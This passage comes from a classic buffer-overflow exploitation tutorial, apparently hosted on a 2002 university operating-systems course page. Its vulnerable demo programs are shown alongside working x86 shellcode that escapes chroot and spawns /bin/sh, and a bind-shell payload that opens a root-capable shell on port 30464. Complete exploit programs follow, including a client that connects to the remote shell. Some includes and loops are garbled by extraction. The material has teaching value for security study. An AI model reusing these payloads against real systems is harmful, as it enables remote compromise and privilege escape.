"\x89\x76\x08" /* movl %esi,0x8(%esi) */
"\x31\xc0" /* xorl %eax,%eax */
"\x88\x46\x07" /* movb %eax,0x7(%esi) */
"\x89\x46\x0c" /* movl %eax,0xc(%esi) */
"\xb0\x0b" /* movb $0xb,%al */
"\x89\xf3" /* movl %esi,%ebx */
"\x8d\x4e\x08" /* leal 0x8(%esi),%ecx */
"\x8d\x56\x0c" /* leal 0xc(%esi),%edx */
"\xcd\x80" /* int $0x80 */
"\x31\xdb" /* xorl %ebx,%ebx */
"\x89\xd8" /* movl %ebx,%eax */
"\x40" /* inc %eax */
"\xcd\x80" /* int $0x80 */
"\xe8\xdc\xff\xff\xff" /* call -0x24 */
"/bin/sh"; /* .string \"/bin/sh\" */
unsigned long get_sp(void)
{
__asm__("movl %esp,%eax");
}
void main(int argc,char **argv)
{
char buff[RET_POSITION+RANGE+ALIGN+1],*ptr;
long addr;
unsigned long sp;
int offset=OFFSET,bsize=RET_POSITION+RANGE+ALIGN+1;
int i;
if(argc>1)
offset=atoi(argv[1]);
sp=get_sp();
addr=sp-offset;
for(i=0;i>8;
buff[i+ALIGN+2]=(addr&0x00ff0000)>>16;
buff[i+ALIGN+3]=(addr&0xff000000)>>24;
}
for(i=0;i
#include
int main(int argc,char **argv)
{
char buffer[1024];
chroot("/home/ftp");
chdir("/");
if(argc>1)
strcpy(buffer,argv[1]);
}
----------------------------------------------------------------------------
If you tries to execute "/bin/sh" with buffer overflow, it may executes
"/home/ftp/bin/sh" ( if it exists ) and you cannot access the other directories
except for "/home/ftp".
5.2 Make break chroot code
If you can execute below code, you can break chroot.
breakchrootasm.c
----------------------------------------------------------------------------
main()
{
mkdir("sh",0755);
chroot("sh");
/* many "../" */
chroot("../../../../../../../../../../../../../../../../");
}
----------------------------------------------------------------------------
This break chroot code makes "sh" directory, because it's easy to reference.
( it's also used to execute "/bin/sh" )
compile and disassemble
----------------------------------------------------------------------------
[ ohhara@ohhara ~ ] {1} $ gcc -o breakchrootasm -static breakchrootasm.c
[ ohhara@ohhara ~ ] {2} $ gdb breakchrootasm
GNU gdb 4.17
Copyright 1998 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for details.
This GDB was configured as "i386-redhat-linux"...
(gdb) disassemble mkdir
Dump of assembler code for function __mkdir:
0x804cac0 <__mkdir>: movl %ebx,%edx
0x804cac2 <__mkdir+2>: movl 0x8(%esp,1),%ecx
0x804cac6 <__mkdir+6>: movl 0x4(%esp,1),%ebx
0x804caca <__mkdir+10>: movl $0x27,%eax
0x804cacf <__mkdir+15>: int $0x80
0x804cad1 <__mkdir+17>: movl %edx,%ebx
0x804cad3 <__mkdir+19>: cmpl $0xfffff001,%eax
0x804cad8 <__mkdir+24>: jae 0x804cc40 <__syscall_error>
0x804cade <__mkdir+30>: ret
0x804cadf <__mkdir+31>: nop
End of assembler dump.
(gdb) disassemble chroot
Dump of assembler code for function chroot:
0x804cb60 : movl %ebx,%edx
0x804cb62 : movl 0x4(%esp,1),%ebx
0x804cb66 : movl $0x3d,%eax
0x804cb6b : int $0x80
0x804cb6d : movl %edx,%ebx
0x804cb6f : cmpl $0xfffff001,%eax
0x804cb74 : jae 0x804cc40 <__syscall_error>
0x804cb7a : ret
0x804cb7b : nop
0x804cb7c : nop
0x804cb7d : nop
0x804cb7e : nop
0x804cb7f : nop
End of assembler dump.
(gdb)
----------------------------------------------------------------------------
mkdir("sh",0755); code
----------------------------------------------------------------------------
/* mkdir first argument is %ebx and second argument is */
/* %ecx. */
char code[]=
"\x31\xc0" /* xorl %eax,%eax */
"\x31\xc9" /* xorl %ecx,%ecx */
"\xb0\x17" /* movb $0x27,%al */
"\x8d\x5e\x05" /* leal 0x5(%esi),%ebx */
/* %esi has to reference "/bin/sh" before using this */
/* instruction. This instruction load address of "sh" */
/* and store at %ebx */
"\xfe\xc5" /* incb %ch */
/* %cx = 0000 0001 0000 0000 */
"\xb0\x3d" /* movb $0xed,%cl */
/* %cx = 0000 0001 1110 1101 */
/* %cx = 000 111 101 101 */
/* %cx = 0 7 5 5 */
"\xcd\x80"; /* int $0x80 */
----------------------------------------------------------------------------
chroot("sh"); code
----------------------------------------------------------------------------
/* chroot first argument is ebx */
char code[]=
"\x31\xc0" /* xorl %eax,%eax */
"\x8d\x5e\x05" /* leal 0x5(%esi),%ebx */
"\xb0\x3d" /* movb $0x3d,%al */
"\xcd\x80"; /* int $0x80 */
----------------------------------------------------------------------------
chroot("../../../../../../../../../../../../../../../../"); code
----------------------------------------------------------------------------
char code[]=
"\xbb\xd2\xd1\xd0\xff" /* movl $0xffd0d1d2,%ebx */
/* disguised "../" character string */
"\xf7\xdb" /* negl %ebx */
/* %ebx = $0x002f2e2e */
/* intel x86 is little endian. */
/* %ebx = "../" */
"\x31\xc9" /* xorl %ecx,%ecx */
"\xb1\x10" /* movb $0x10,%cl */
/* prepare for looping 16 times. */
"\x56" /* pushl %esi */
/* backup current %esi. %esi has the pointer of */
/* "/bin/sh". */
"\x01\xce" /* addl %ecx,%esi */
"\x89\x1e" /* movl %ebx,(%esi) */
"\x83\xc6\x03" /* addl $0x3,%esi */
"\xe0\xf9" /* loopne -0x7 */
/* make "../../../../ . . . " character string at */
/* 0x10(%esi) by looping. */
"\x5e" /* popl %esi */
/* restore %esi. */
"\xb0\x3d" /* movb $0x3d,%al */
"\x8d\x5e\x10" /* leal 0x10(%esi),%ebx */
/* %ebx has the address of "../../../../ . . . ". */
"\xcd\x80"; /* int $0x80 */
----------------------------------------------------------------------------
5.3 Modify the normal shellcode
Making new shellcode is very easy if you make break chroot code. Just insert
the code into the start of the normal shellcode and modify jmp and call
argument.
new shellcode
----------------------------------------------------------------------------
char shellcode[]=
"\xeb\x4f" /* jmp 0x4f */
"\x31\xc0" /* xorl %eax,%eax */
"\x31\xc9" /* xorl %ecx,%ecx */
"\x5e" /* popl %esi */
"\x88\x46\x07" /* movb %al,0x7(%esi) */
"\xb0\x27" /* movb $0x27,%al */
"\x8d\x5e\x05" /* leal 0x5(%esi),%ebx */
"\xfe\xc5" /* incb %ch */
"\xb1\xed" /* movb $0xed,%cl */
"\xcd\x80" /* int $0x80 */
"\x31\xc0" /* xorl %eax,%eax */
"\x8d\x5e\x05" /* leal 0x5(%esi),%ebx */
"\xb0\x3d" /* movb $0x3d,%al */
"\xcd\x80" /* int $0x80 */
"\x31\xc0" /* xorl %eax,%eax */
"\xbb\xd2\xd1\xd0\xff" /* movl $0xffd0d1d2,%ebx */
"\xf7\xdb" /* negl %ebx */
"\x31\xc9" /* xorl %ecx,%ecx */
"\xb1\x10" /* movb $0x10,%cl */
"\x56" /* pushl %esi */
"\x01\xce" /* addl %ecx,%esi */
"\x89\x1e" /* movl %ebx,(%esi) */
"\x83\xc6\x03" /* addl %0x3,%esi */
"\xe0\xf9" /* loopne -0x7 */
"\x5e" /* popl %esi */
"\xb0\x3d" /* movb $0x3d,%al */
"\x8d\x5e\x10" /* leal 0x10(%esi),%ebx */
"\xcd\x80" /* int $0x80 */
"\x31\xc0" /* xorl %eax,%eax */
"\x89\x76\x08" /* movl %esi,0x8(%esi) */
"\x89\x46\x0c" /* movl %eax,0xc(%esi) */
"\xb0\x0b" /* movb $0xb,%al */
"\x89\xf3" /* movl %esi,%ebx */
"\x8d\x4e\x08" /* leal 0x8(%esi),%ecx */
"\x8d\x56\x0c" /* leal 0xc(%esi),%edx */
"\xcd\x80" /* int $0x80 */
"\xe8\xac\xff\xff\xff" /* call -0x54 */
"/bin/sh"; /* .string \"/bin/sh\" */
----------------------------------------------------------------------------
5.4 Exploit vulnerable3 program
With this shellcode, you can make an exploit code easily.
exploit3.c
----------------------------------------------------------------------------
#include
#include
#define ALIGN 0
#define OFFSET 0
#define RET_POSITION 1024
#define RANGE 20
#define NOP 0x90
char shellcode[]=
"\xeb\x4f" /* jmp 0x4f */
"\x31\xc0" /* xorl %eax,%eax */
"\x31\xc9" /* xorl %ecx,%ecx */
"\x5e" /* popl %esi */
"\x88\x46\x07" /* movb %al,0x7(%esi) */
"\xb0\x27" /* movb $0x27,%al */
"\x8d\x5e\x05" /* leal 0x5(%esi),%ebx */
"\xfe\xc5" /* incb %ch */
"\xb1\xed" /* movb $0xed,%cl */
"\xcd\x80" /* int $0x80 */
"\x31\xc0" /* xorl %eax,%eax */
"\x8d\x5e\x05" /* leal 0x5(%esi),%ebx */
"\xb0\x3d" /* movb $0x3d,%al */
"\xcd\x80" /* int $0x80 */
"\x31\xc0" /* xorl %eax,%eax */
"\xbb\xd2\xd1\xd0\xff" /* movl $0xffd0d1d2,%ebx */
"\xf7\xdb" /* negl %ebx */
"\x31\xc9" /* xorl %ecx,%ecx */
"\xb1\x10" /* movb $0x10,%cl */
"\x56" /* pushl %esi */
"\x01\xce" /* addl %ecx,%esi */
"\x89\x1e" /* movl %ebx,(%esi) */
"\x83\xc6\x03" /* addl %0x3,%esi */
"\xe0\xf9" /* loopne -0x7 */
"\x5e" /* popl %esi */
"\xb0\x3d" /* movb $0x3d,%al */
"\x8d\x5e\x10" /* leal 0x10(%esi),%ebx */
"\xcd\x80" /* int $0x80 */
"\x31\xc0" /* xorl %eax,%eax */
"\x89\x76\x08" /* movl %esi,0x8(%esi) */
"\x89\x46\x0c" /* movl %eax,0xc(%esi) */
"\xb0\x0b" /* movb $0xb,%al */
"\x89\xf3" /* movl %esi,%ebx */
"\x8d\x4e\x08" /* leal 0x8(%esi),%ecx */
"\x8d\x56\x0c" /* leal 0xc(%esi),%edx */
"\xcd\x80" /* int $0x80 */
"\xe8\xac\xff\xff\xff" /* call -0x54 */
"/bin/sh"; /* .string \"/bin/sh\" */
unsigned long get_sp(void)
{
__asm__("movl %esp,%eax");
}
void main(int argc,char **argv)
{
char buff[RET_POSITION+RANGE+ALIGN+1],*ptr;
long addr;
unsigned long sp;
int offset=OFFSET,bsize=RET_POSITION+RANGE+ALIGN+1;
int i;
if(argc>1)
offset=atoi(argv[1]);
sp=get_sp();
addr=sp-offset;
for(i=0;i>8;
buff[i+ALIGN+2]=(addr&0x00ff0000)>>16;
buff[i+ALIGN+3]=(addr&0xff000000)>>24;
}
for(i=0;i
int main(int argc,char **argv)
{
char buffer[1024];
if(argc>1)
strcpy(buffer,argv[1]);
}
----------------------------------------------------------------------------
This is standard vulnerable program. I will use this for socket opening
buffer overflow. Because I am too lazy to make a example daemon program. :)
However, after you see the code, you will not be disappointed.
6.2 Make open socket code
If you can execute below code, you can open a socket.
opensocketasm1.c
----------------------------------------------------------------------------
#include
#include
#include
int soc,cli,soc_len;
struct sockaddr_in serv_addr;
struct sockaddr_in cli_addr;
int main()
{
if(fork()==0)
{
serv_addr.sin_family=AF_INET;
serv_addr.sin_addr.s_addr=htonl(INADDR_ANY);
serv_addr.sin_port=htons(30464);
soc=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
bind(soc,(struct sockaddr *)&serv_addr,sizeof(serv_addr));
listen(soc,1);
soc_len=sizeof(cli_addr);
cli=accept(soc,(struct sockaddr *)&cli_addr,&soc_len);
dup2(cli,0);
dup2(cli,1);
dup2(cli,2);
execl("/bin/sh","sh",0);
}
}
----------------------------------------------------------------------------
It's difficult to make with assembly language. You can make this program
simple.
opensocketasm2.c
----------------------------------------------------------------------------
#include
#include
#include
int soc,cli;
struct sockaddr_in serv_addr;
int main()
{
if(fork()==0)
{
serv_addr.sin_family=2;
serv_addr.sin_addr.s_addr=0;
serv_addr.sin_port=0x77;
soc=socket(2,1,6);
bind(soc,(struct sockaddr *)&serv_addr,0x10);
listen(soc,1);
cli=accept(soc,0,0);
dup2(cli,0);
dup2(cli,1);
dup2(cli,2);
execl("/bin/sh","sh",0);
}
}
----------------------------------------------------------------------------
compile and disassemble
----------------------------------------------------------------------------
[ ohhara@ohhara ~ ] {1} $ gcc -o opensocketasm2 -static opensocketasm2.c
[ ohhara@ohhara ~ ] {2} $ gdb opensocketasm2
GNU gdb 4.17
Copyright 1998 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for details.
This GDB was configured as "i386-redhat-linux"...
(gdb) disassemble fork
Dump of assembler code for function fork:
0x804ca90 : movl $0x2,%eax
0x804ca95 : int $0x80
0x804ca97 : cmpl $0xfffff001,%eax
0x804ca9c : jae 0x804cdc0 <__syscall_error>
0x804caa2 : ret
0x804caa3 : nop
0x804caa4 : nop
0x804caa5 : nop
0x804caa6 : nop
0x804caa7 : nop
0x804caa8 : nop
0x804caa9 : nop
0x804caaa : nop
0x804caab : nop
0x804caac : nop
0x804caad : nop
0x804caae : nop
0x804caaf : nop
End of assembler dump.
(gdb) disassemble socket
Dump of assembler code for function socket:
0x804cda0 : movl %ebx,%edx
0x804cda2 : movl $0x66,%eax
0x804cda7 : movl $0x1,%ebx
0x804cdac : leal 0x4(%esp,1),%ecx
0x804cdb0 : int $0x80
0x804cdb2 : movl %edx,%ebx
0x804cdb4 : cmpl $0xffffff83,%eax
0x804cdb7 : jae 0x804cdc0 <__syscall_error>
0x804cdbd : ret
0x804cdbe : nop
0x804cdbf : nop
End of assembler dump.
(gdb) disassemble bind
Dump of assembler code for function bind:
0x804cd60 : movl %ebx,%edx
0x804cd62 : movl $0x66,%eax
0x804cd67 : movl $0x2,%ebx
0x804cd6c : leal 0x4(%esp,1),%ecx
0x804cd70 : int $0x80
0x804cd72 : movl %edx,%ebx
0x804cd74 : cmpl $0xffffff83,%eax
0x804cd77 : jae 0x804cdc0 <__syscall_error>
0x804cd7d : ret
0x804cd7e : nop
0x804cd7f : nop
End of assembler dump.
(gdb) disassemble listen
Dump of assembler code for function listen:
0x804cd80 : movl %ebx,%edx
0x804cd82 : movl $0x66,%eax
0x804cd87 : movl $0x4,%ebx
0x804cd8c : leal 0x4(%esp,1),%ecx
0x804cd90 : int $0x80
0x804cd92 : movl %edx,%ebx
0x804cd94 : cmpl $0xffffff83,%eax
0x804cd97 : jae 0x804cdc0 <__syscall_error>
0x804cd9d : ret
0x804cd9e : nop
0x804cd9f : nop
End of assembler dump.
(gdb) disassemble accept
Dump of assembler code for function __accept:
0x804cd40 <__accept>: movl %ebx,%edx
0x804cd42 <__accept+2>: movl $0x66,%eax
0x804cd47 <__accept+7>: movl $0x5,%ebx
0x804cd4c <__accept+12>: leal 0x4(%esp,1),%ecx
0x804cd50 <__accept+16>: int $0x80
0x804cd52 <__accept+18>: movl %edx,%ebx
0x804cd54 <__accept+20>: cmpl $0xffffff83,%eax
0x804cd57 <__accept+23>: jae 0x804cdc0 <__syscall_error>
0x804cd5d <__accept+29>: ret
0x804cd5e <__accept+30>: nop
0x804cd5f <__accept+31>: nop
End of assembler dump.
(gdb) disassemble dup2
Dump of assembler code for function dup2:
0x804cbe0 : movl %ebx,%edx
0x804cbe2 : movl 0x8(%esp,1),%ecx
0x804cbe6 : movl 0x4(%esp,1),%ebx
0x804cbea : movl $0x3f,%eax
0x804cbef : int $0x80
0x804cbf1 : movl %edx,%ebx
0x804cbf3 : cmpl $0xfffff001,%eax
0x804cbf8 : jae 0x804cdc0 <__syscall_error>
0x804cbfe : ret
0x804cbff : nop
End of assembler dump.
(gdb)
----------------------------------------------------------------------------
fork(); code
----------------------------------------------------------------------------
char code[]=
"\x31\xc0" /* xorl %eax,%eax */
"\xb0\x02" /* movb $0x2,%al */
"\xcd\x80"; /* int $0x80 */
----------------------------------------------------------------------------
socket(2,1,6); code
----------------------------------------------------------------------------
/* %ecx is a pointer of all arguments. */
char code[]=
"\x31\xc0" /* xorl %eax,%eax */
"\x31\xdb" /* xorl %ebx,%ebx */
"\x89\xf1" /* movl %esi,%ecx */
"\xb0\x02" /* movb $0x2,%al */
"\x89\x06" /* movl %eax,(%esi) */
/* The first argument. */
/* %esi has reference free memory space before using */
/* this instruction. */
"\xb0\x01" /* movb $0x1,%al */
"\x89\x46\x04" /* movl %eax,0x4(%esi) */
/* The second argument. */
"\xb0\x06" /* movb $0x6,%al */
"\x89\x46\x08" /* movl %eax,0x8(%esi) */
/* The third argument. */
"\xb0\x66" /* movb $0x66,%al */
"\xb3\x01" /* movb $0x1,%bl */
"\xcd\x80"; /* int $0x80 */
----------------------------------------------------------------------------
bind(soc,(struct sockaddr *)&serv_addr,0x10); code
----------------------------------------------------------------------------
/* %ecx is a pointer of all arguments. */
char code[]=
"\x89\xf1" /* movl %esi,%ecx */
"\x89\x06" /* movl %eax,(%esi) */
/* %eax has to have soc value before using this */
/* instruction. */
/* the first argument. */
"\xb0\x02" /* movb $0x2,%al */
"\x66\x89\x46\x0c" /* movw %ax,0xc(%esi) */
/* serv_addr.sin_family=2 */
/* 2 is stored at 0xc(%esi). */
"\xb0\x77" /* movb $0x77,%al */
"\x66\x89\x46\x0e" /* movw %ax,0xe(%esi) */
/* store port number at 0xe(%esi) */
"\x8d\x46\x0c" /* leal 0xc(%esi),%eax */
/* %eax = the address of serv_addr */
"\x89\x46\x04" /* movl %eax,0x4(%esi) */
/* the second argument. */
"\x31\xc0" /* xorl %eax,%eax */
"\x89\x46\x10" /* movl %eax,0x10(%esi) */
/* serv_addr.sin_addr.s_addr=0 */
/* 0 is stored at 0x10(%esi). */
"\xb0\x10" /* movb $0x10,%al */
"\x89\x46\x08" /* movl %eax,0x8(%esi) */
/* the third argument. */
"\xb0\x66" /* movb $0x66,%al */
"\xb3\x02" /* movb $0x2,%bl */
"\xcd\x80"; /* int $0x80 */
----------------------------------------------------------------------------
listen(soc,1); code
----------------------------------------------------------------------------
/* %ecx is a pointer of all arguments. */
char code[]=
"\x89\xf1" /* movl %esi,%ecx */
"\x89\x06" /* movl %eax,(%esi) */
/* %eax has to have soc value before using this */
/* instruction. */
/* the first argument. */
"\xb0\x01" /* movb $0x1,%al */
"\x89\x46\x04" /* movl %eax,0x4(%esi) */
/* the second argument. */
"\xb0\x66" /* movb $0x66,%al */
"\xb3\x04" /* movb $0x4,%bl */
"\xcd\x80"; /* int $0x80 */
----------------------------------------------------------------------------
accept(soc,0,0); code
----------------------------------------------------------------------------
/* %ecx is a pointer of all arguments. */
char code[]=
"\x89\xf1" /* movl %esi,%ecx */
"\x89\xf1" /* movl %eax,(%esi) */
/* %eax has to have soc value before using this */
/* instruction. */
/* the first argument. */
"\x31\xc0" /* xorl %eax,%eax */
"\x89\x46\x04" /* movl %eax,0x4(%esi) */
/* the second argument. */
"\x89\x46\x08" /* movl %eax,0x8(%esi) */
/* the third argument. */
"\xb0\x66" /* movb $0x66,%al */
"\xb3\x05" /* movb $0x5,%bl */
"\xcd\x80"; /* int $0x80 */
----------------------------------------------------------------------------
dup2(cli,0); code
----------------------------------------------------------------------------
/* the first argument is %ebx and the second argument */
/* is %ecx */
char code[]=
/* %eax has to have cli value before using this */
/* instruction. */
"\x88\xc3" /* movb %al,%bl */
"\xb0\x3f" /* movb $0x3f,%al */
"\x31\xc9" /* xorl %ecx,%ecx */
"\xcd\x80"; /* int $0x80 */
----------------------------------------------------------------------------
6.3 Modify the normal shellcode
You need some works to merge the above codes.
new shellcode
----------------------------------------------------------------------------
char shellcode[]=
"\x31\xc0" /* xorl %eax,%eax */
"\xb0\x02" /* movb $0x2,%al */
"\xcd\x80" /* int $0x80 */
"\x85\xc0" /* testl %eax,%eax */
"\x75\x43" /* jne 0x43 */
/* fork()!=0 case */
/* It will call exit(0) */
/* To do that, it will jump twice, because exit(0) is */
/* located so far. */
"\xeb\x43" /* jmp 0x43 */
/* fork()==0 case */
/* It will call -0xa5 */
/* To do that, it will jump twice, because call -0xa5 */
/* is located so far. */
"\x5e" /* popl %esi */
"\x31\xc0" /* xorl %eax,%eax */
"\x31\xdb" /* xorl %ebx,%ebx */
"\x89\xf1" /* movl %esi,%ecx */
"\xb0\x02" /* movb $0x2,%al */
"\x89\x06" /* movl %eax,(%esi) */
"\xb0\x01" /* movb $0x1,%al */
"\x89\x46\x04" /* movl %eax,0x4(%esi) */
"\xb0\x06" /* movb $0x6,%al */
"\x89\x46\x08" /* movl %eax,0x8(%esi) */
"\xb0\x66" /* movb $0x66,%al */
"\xb3\x01" /* movb $0x1,%bl */
"\xcd\x80" /* int $0x80 */
"\x89\x06" /* movl %eax,(%esi) */
"\xb0\x02" /* movb $0x2,%al */
"\x66\x89\x46\x0c" /* movw %ax,0xc(%esi) */
"\xb0\x77" /* movb $0x77,%al */
"\x66\x89\x46\x0e" /* movw %ax,0xe(%esi) */
"\x8d\x46\x0c" /* leal 0xc(%esi),%eax */
"\x89\x46\x04" /* movl %eax,0x4(%esi) */
"\x31\xc0" /* xorl %eax,%eax */
"\x89\x46\x10" /* movl %eax,0x10(%esi) */
"\xb0\x10" /* movb $0x10,%al */
"\x89\x46\x08" /* movl %eax,0x8(%esi) */
"\xb0\x66" /* movb $0x66,%al */
"\xb3\x02" /* movb $0x2,%bl */
"\xcd\x80" /* int $0x80 */
"\xeb\x04" /* jmp 0x4 */
"\xeb\x55" /* jmp 0x55 */
"\xeb\x5b" /* jmp 0x5b */
"\xb0\x01" /* movb $0x1,%al */
"\x89\x46\x04" /* movl %eax,0x4(%esi) */
"\xb0\x66" /* movb $0x66,%al */
"\xb3\x04" /* movb $0x4,%bl */
"\xcd\x80" /* int $0x80 */
"\x31\xc0" /* xorl %eax,%eax */
"\x89\x46\x04" /* movl %eax,0x4(%esi) */
"\x89\x46\x08" /* movl %eax,0x8(%esi) */
"\xb0\x66" /* movb $0x66,%al */
"\xb3\x05" /* movb $0x5,%bl */
"\xcd\x80" /* int $0x80 */
"\x88\xc3" /* movb %al,%bl */
"\xb0\x3f" /* movb $0x3f,%al */
"\x31\xc9" /* xorl %ecx,%ecx */
"\xcd\x80" /* int $0x80 */
"\xb0\x3f" /* movb $0x3f,%al */
"\xb1\x01" /* movb $0x1,%cl */
"\xcd\x80" /* int $0x80 */
"\xb0\x3f" /* movb $0x3f,%al */
"\xb1\x02" /* movb $0x2,%cl */
"\xcd\x80" /* int $0x80 */
"\xb8\x2f\x62\x69\x6e" /* movl $0x6e69622f,%eax */
/* %eax="/bin" */
"\x89\x06" /* movl %eax,(%esi) */
"\xb8\x2f\x73\x68\x2f" /* movl $0x2f68732f,%eax */
/* %eax="/sh/" */
"\x89\x46\x04" /* movl %eax,0x4(%esi) */
"\x31\xc0" /* xorl %eax,%eax */
"\x88\x46\x07" /* movb %al,0x7(%esi) */
"\x89\x76\x08" /* movl %esi,0x8(%esi) */
"\x89\x46\x0c" /* movl %eax,0xc(%esi) */
"\xb0\x0b" /* movb $0xb,%al */
"\x89\xf3" /* movl %esi,%ebx */
"\x8d\x4e\x08" /* leal 0x8(%esi),%ecx */
"\x8d\x56\x0c" /* leal 0xc(%esi),%edx */
"\xcd\x80" /* int $0x80 */
"\x31\xc0" /* xorl %eax,%eax */
"\xb0\x01" /* movb $0x1,%al */
"\x31\xdb" /* xorl %ebx,%ebx */
"\xcd\x80" /* int $0x80 */
"\xe8\x5b\xff\xff\xff"; /* call -0xa5 */
----------------------------------------------------------------------------
6.4 Exploit vulnerable4 program
With this shellcode, you can make an exploit code easily. And You have to
make code which connects to the socket.
exploit4.c
----------------------------------------------------------------------------
#include
#include
#include
#include
#include
#define ALIGN 0
#define OFFSET 0
#define RET_POSITION 1024
#define RANGE 20
#define NOP 0x90
char shellcode[]=
"\x31\xc0" /* xorl %eax,%eax */
"\xb0\x02" /* movb $0x2,%al */
"\xcd\x80" /* int $0x80 */
"\x85\xc0" /* testl %eax,%eax */
"\x75\x43" /* jne 0x43 */
"\xeb\x43" /* jmp 0x43 */
"\x5e" /* popl %esi */
"\x31\xc0" /* xorl %eax,%eax */
"\x31\xdb" /* xorl %ebx,%ebx */
"\x89\xf1" /* movl %esi,%ecx */
"\xb0\x02" /* movb $0x2,%al */
"\x89\x06" /* movl %eax,(%esi) */
"\xb0\x01" /* movb $0x1,%al */
"\x89\x46\x04" /* movl %eax,0x4(%esi) */
"\xb0\x06" /* movb $0x6,%al */
"\x89\x46\x08" /* movl %eax,0x8(%esi) */
"\xb0\x66" /* movb $0x66,%al */
"\xb3\x01" /* movb $0x1,%bl */
"\xcd\x80" /* int $0x80 */
"\x89\x06" /* movl %eax,(%esi) */
"\xb0\x02" /* movb $0x2,%al */
"\x66\x89\x46\x0c" /* movw %ax,0xc(%esi) */
"\xb0\x77" /* movb $0x77,%al */
"\x66\x89\x46\x0e" /* movw %ax,0xe(%esi) */
"\x8d\x46\x0c" /* leal 0xc(%esi),%eax */
"\x89\x46\x04" /* movl %eax,0x4(%esi) */
"\x31\xc0" /* xorl %eax,%eax */
"\x89\x46\x10" /* movl %eax,0x10(%esi) */
"\xb0\x10" /* movb $0x10,%al */
"\x89\x46\x08" /* movl %eax,0x8(%esi) */
"\xb0\x66" /* movb $0x66,%al */
"\xb3\x02" /* movb $0x2,%bl */
"\xcd\x80" /* int $0x80 */
"\xeb\x04" /* jmp 0x4 */
"\xeb\x55" /* jmp 0x55 */
"\xeb\x5b" /* jmp 0x5b */
"\xb0\x01" /* movb $0x1,%al */
"\x89\x46\x04" /* movl %eax,0x4(%esi) */
"\xb0\x66" /* movb $0x66,%al */
"\xb3\x04" /* movb $0x4,%bl */
"\xcd\x80" /* int $0x80 */
"\x31\xc0" /* xorl %eax,%eax */
"\x89\x46\x04" /* movl %eax,0x4(%esi) */
"\x89\x46\x08" /* movl %eax,0x8(%esi) */
"\xb0\x66" /* movb $0x66,%al */
"\xb3\x05" /* movb $0x5,%bl */
"\xcd\x80" /* int $0x80 */
"\x88\xc3" /* movb %al,%bl */
"\xb0\x3f" /* movb $0x3f,%al */
"\x31\xc9" /* xorl %ecx,%ecx */
"\xcd\x80" /* int $0x80 */
"\xb0\x3f" /* movb $0x3f,%al */
"\xb1\x01" /* movb $0x1,%cl */
"\xcd\x80" /* int $0x80 */
"\xb0\x3f" /* movb $0x3f,%al */
"\xb1\x02" /* movb $0x2,%cl */
"\xcd\x80" /* int $0x80 */
"\xb8\x2f\x62\x69\x6e" /* movl $0x6e69622f,%eax */
"\x89\x06" /* movl %eax,(%esi) */
"\xb8\x2f\x73\x68\x2f" /* movl $0x2f68732f,%eax */
"\x89\x46\x04" /* movl %eax,0x4(%esi) */
"\x31\xc0" /* xorl %eax,%eax */
"\x88\x46\x07" /* movb %al,0x7(%esi) */
"\x89\x76\x08" /* movl %esi,0x8(%esi) */
"\x89\x46\x0c" /* movl %eax,0xc(%esi) */
"\xb0\x0b" /* movb $0xb,%al */
"\x89\xf3" /* movl %esi,%ebx */
"\x8d\x4e\x08" /* leal 0x8(%esi),%ecx */
"\x8d\x56\x0c" /* leal 0xc(%esi),%edx */
"\xcd\x80" /* int $0x80 */
"\x31\xc0" /* xorl %eax,%eax */
"\xb0\x01" /* movb $0x1,%al */
"\x31\xdb" /* xorl %ebx,%ebx */
"\xcd\x80" /* int $0x80 */
"\xe8\x5b\xff\xff\xff"; /* call -0xa5 */
unsigned long get_sp(void)
{
__asm__("movl %esp,%eax");
}
long getip(char *name)
{
struct hostent *hp;
long ip;
if((ip=inet_addr(name))==-1)
{
if((hp=gethostbyname(name))==NULL)
{
fprintf(stderr,"Can't resolve host.\n");
exit(0);
}
memcpy(&ip,(hp->h_addr),4);
}
return ip;
}
int exec_sh(int sockfd)
{
char snd[4096],rcv[4096];
fd_set rset;
while(1)
{
FD_ZERO(&rset);
FD_SET(fileno(stdin),&rset);
FD_SET(sockfd,&rset);
select(255,&rset,NULL,NULL,NULL);
if(FD_ISSET(fileno(stdin),&rset))
{
memset(snd,0,sizeof(snd));
fgets(snd,sizeof(snd),stdin);
write(sockfd,snd,strlen(snd));
}
if(FD_ISSET(sockfd,&rset))
{
memset(rcv,0,sizeof(rcv));
if(read(sockfd,rcv,sizeof(rcv))<=0)
exit(0);
fputs(rcv,stdout);
}
}
}
int connect_sh(long ip)
{
int sockfd,i;
struct sockaddr_in sin;
printf("Connect to the shell\n");
fflush(stdout);
memset(&sin,0,sizeof(sin));
sin.sin_family=AF_INET;
sin.sin_port=htons(30464);
sin.sin_addr.s_addr=ip;
if((sockfd=socket(AF_INET,SOCK_STREAM,0))<0)
{
printf("Can't create socket\n");
exit(0);
}
if(connect(sockfd,(struct sockaddr *)&sin,sizeof(sin))<0)
{
printf("Can't connect to the shell\n");
exit(0);
}
return sockfd;
}
void main(int argc,char **argv)
{
char buff[RET_POSITION+RANGE+ALIGN+1],*ptr;
long addr;
unsigned long sp;
int offset=OFFSET,bsize=RET_POSITION+RANGE+ALIGN+1;
int i;
int sockfd;
if(argc>1)
offset=atoi(argv[1]);
sp=get_sp();
addr=sp-offset;
for(i=0;i>8;
buff[i+ALIGN+2]=(addr&0x00ff0000)>>16;
buff[i+ALIGN+3]=(addr&0xff000000)>>24;
}
for(i=0;i
© 2002 T. P. Baker & Florida State University.
No part of this publication may be reproduced, stored in a retrieval system, or
transmitted in any form or by any means without written permission.
(Last updated by $Author: cop4610 $ on $Date: 2002/09/02 20:27:19 $.)
|